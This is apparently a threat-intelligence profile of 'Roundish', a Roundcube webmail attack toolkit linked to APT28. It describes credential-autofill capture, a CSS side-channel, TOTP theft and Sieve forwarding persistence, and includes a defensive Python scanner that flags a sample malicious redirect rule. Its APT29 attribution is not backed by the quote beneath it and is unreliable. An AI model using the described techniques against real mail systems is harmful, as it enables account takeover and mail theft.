Mallory
Malware, used by 2 actors

Roundish

Roundish is a Roundcube-focused exploitation toolkit and malware framework assessed with medium-high confidence to align with APT28 (Fancy Bear/Sednit), the Russian GRU-linked threat actor. Researchers identified an exposed open directory on 203.161.50[.]145:8889 in January 2026 containing a reportedly complete toolkit, including development and production XSS payloads, a Flask-based C2 server, CSS-injection tooling, operator bash history, and a Go-based Linux implant.

The toolkit targets webmail, especially Roundcube, to harvest credentials, exfiltrate emails in bulk via the Roundcube viewsource API, steal address book contents, extract 2FA/TOTP secrets, and establish persistence through server-side Sieve mail-forwarding rules that redirect mail to advenwolf@proton[.]me. Roundish uses modular eval()-based JavaScript loading and base64-encoded exfiltration. Distinctive capabilities include an uncommon XSS technique that injects hidden username/password fields to capture browser password-manager autofill values, a CSS selector side-channel module (roundcube-css-exploit.js) for progressive extraction of DOM values such as CSRF tokens without JavaScript injection, and browser credential theft targeting Chrome and Firefox.

Operator artifacts and infrastructure analysis confirmed active targeting of mail.dmsu.gov.ua, the Roundcube instance of Ukraine’s State Migration Service. Related infrastructure included a C2 server at 203.161.50[.]145 hosted on Namecheap infrastructure in Phoenix, Arizona; a primary C2 domain zhblz[.]com and subdomain a.zhblz[.]com used for the CSS side-channel server; and an Oracle Cloud pivot host at 130.61.233[.]105 in Frankfurt used for SSH pivoting. The exposed server also hosted a Flask C2 component (serverlast.py) that served a cloned Roundcube login page and captured credentials via /authentification.php before redirecting victims to a lure PDF named Adob_Scan_15_ian._2025.pdf.

A Go-based Linux implant named httd (SHA-256: e76f54b7b98ba3a08f39392e6886a9cb3e97d57b8a076e6b948968d0be392ed8) was also found in exfiltrated data and provided persistence via cron, systemd, and SELinux policy manipulation.
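The server-side Sieve forwarding rule described above (and quoted under T1114.003 below) is something a Roundcube or Dovecot administrator can audit directly. The following Python is an added example, not code from this page or from the toolkit: it scans a stored Sieve script for redirect actions whose target domain lies outside the organisation. The sample script, the internal-domain set and the function names are constructed for the illustration; the external address is the one named on this page.

```python
import re

# Constructed sample of a per-user Sieve script of the kind Roundcube's
# managesieve plugin writes. The first rule forwards a copy of every message
# to the external address named on this page; the second rule is benign.
SAMPLE_SIEVE = r'''# rule:[Backup]
require ["copy", "fileinto"];
if true
{
    redirect :copy "advenwolf@proton.me";
}
# rule:[Internal archive]
if address :domain "from" "dmsu.gov.ua"
{
    fileinto "Archive";
    redirect "archive@dmsu.gov.ua";
}
'''

# Quoted strings are matched first so a '#' inside a string is not taken for
# a comment; the two comment alternatives are then dropped. Multi-line
# "text:" strings are not handled by this small scanner.
TOKEN_RE = re.compile(r'"(?:[^"\\]|\\.)*"|#[^\n]*|/\*.*?\*/', re.S)
# A redirect action: optional tagged arguments such as :copy, one quoted
# address, terminating semicolon. Sieve identifiers are case-insensitive.
REDIRECT_RE = re.compile(r'\bredirect\b((?:\s+:\w+)*)\s+"((?:[^"\\]|\\.)*)"\s*;', re.I)

def strip_comments(script: str) -> str:
    """Remove # line comments and /* */ block comments, leaving strings intact."""
    return TOKEN_RE.sub(lambda m: m.group(0) if m.group(0).startswith('"') else "", script)

def redirect_targets(script: str) -> list:
    """Every address a live (non-commented) redirect action forwards to."""
    clean = strip_comments(script)
    # Unescape \" and \\ inside the quoted address.
    return [re.sub(r'\\(.)', r'\1', m.group(2)) for m in REDIRECT_RE.finditer(clean)]

def external_redirects(script: str, internal_domains: set) -> list:
    """Redirect targets outside internal_domains: candidate T1114.003 persistence."""
    flagged = []
    for target in redirect_targets(script):
        domain = target.rpartition("@")[2].lower()
        if not any(domain == d or domain.endswith("." + d) for d in internal_domains):
            flagged.append(target)
    return flagged

if __name__ == "__main__":
    for addr in external_redirects(SAMPLE_SIEVE, {"dmsu.gov.ua"}):
        print("external forwarding rule ->", addr)
```

Run it against each user's active script from the Sieve server (for Dovecot, the `.sieve` files under the user's mail directory) and alert on every flagged address, not only the one known here.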

THREAT ACTORS

Groups observed using it

2 distinct threat actors attributed by public researchers.
APT28

Roundish introduces additional components not previously documented in APT28 webmail activity, including a CSS-based side-channel module and browser credential theft capabilities.

via ctoatncsc substack (ctoatncsc.substack.com)
APT29

In January 2026, we identified an exposed open directory ... that contained what appears to be a complete Roundcube exploitation toolkit... Roundish introduces additional components... including a CSS-based side-channel module and browser credential theft capabilities.

via hunt.io blog (hunt.io)
MITRE ATT&CK

Techniques & procedures

10 distinct techniques documented for this family, organized by ATT&CK tactic.

Reconnaissance

1 technique
T1595 Active Scanning (evidence: 1)

"The operator's bash history shows direct reconnaissance with curl mail.dmsu.gov.ua" and "RustScan was used for port scanning reconnaissance."

Resource Development

1 technique
T1583.001 Domains (evidence: 1)

"The primary C2 domain zhblz[.]com ... was registered through NameCheap" and "The subdomain a.zhblz[.]com ... dedicated exclusively to the CSS injection side-channel attack"

Initial Access

1 technique
T1190 Exploit Public-Facing Application (evidence: 2)

The toolkit targets Roundcube webmail and supports credential harvesting, persistent mail forwarding, bulk email exfiltration, address book theft, and 2FA secret extraction.

Credential Access

2 techniques
T1111 Multi-Factor Authentication Interception (evidence: 1)

"keyTwoAuth.js module extracts TOTP secrets" and "exfiltrate TOTP secrets and create application passwords for MFA bypass"

T1649 Steal or Forge Authentication Certificates (evidence: 1)

The toolkit targets Roundcube webmail and supports credential harvesting, persistent mail forwarding, bulk email exfiltration, address book theft, and 2FA secret extraction.

Discovery

1 technique
T1087.003 Email Account (evidence: 1)

"Address book theft ... adbook.js contact extraction"

Collection

2 techniques
T1114 Email Collection (evidence: 1)

The toolkit targets Roundcube webmail and supports credential harvesting, persistent mail forwarding, bulk email exfiltration, address book theft, and 2FA secret extraction.

T1114.003 Email Forwarding Rule (evidence: 1)

"create a server-side Sieve filter that redirects all incoming email to advenwolf@proton.me"

Exfiltration

2 techniques
T1041 Exfiltration Over C2 Channel (evidence: 1)

The toolkit targets Roundcube webmail and supports credential harvesting, persistent mail forwarding, bulk email exfiltration, address book theft, and 2FA secret extraction.

T1567 Exfiltration Over Web Service (evidence: 1)

"HTTP POST to zhblz.com/zJ2w9x" and "/zJ2w9x/uploadfile/ POST Exfiltrated .eml file storage"

INDICATORS OF COMPROMISE

IOCs tracked for this family

12 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

Network (12 tracked)

IPs, domains, and DNS infrastructure linked to this family.
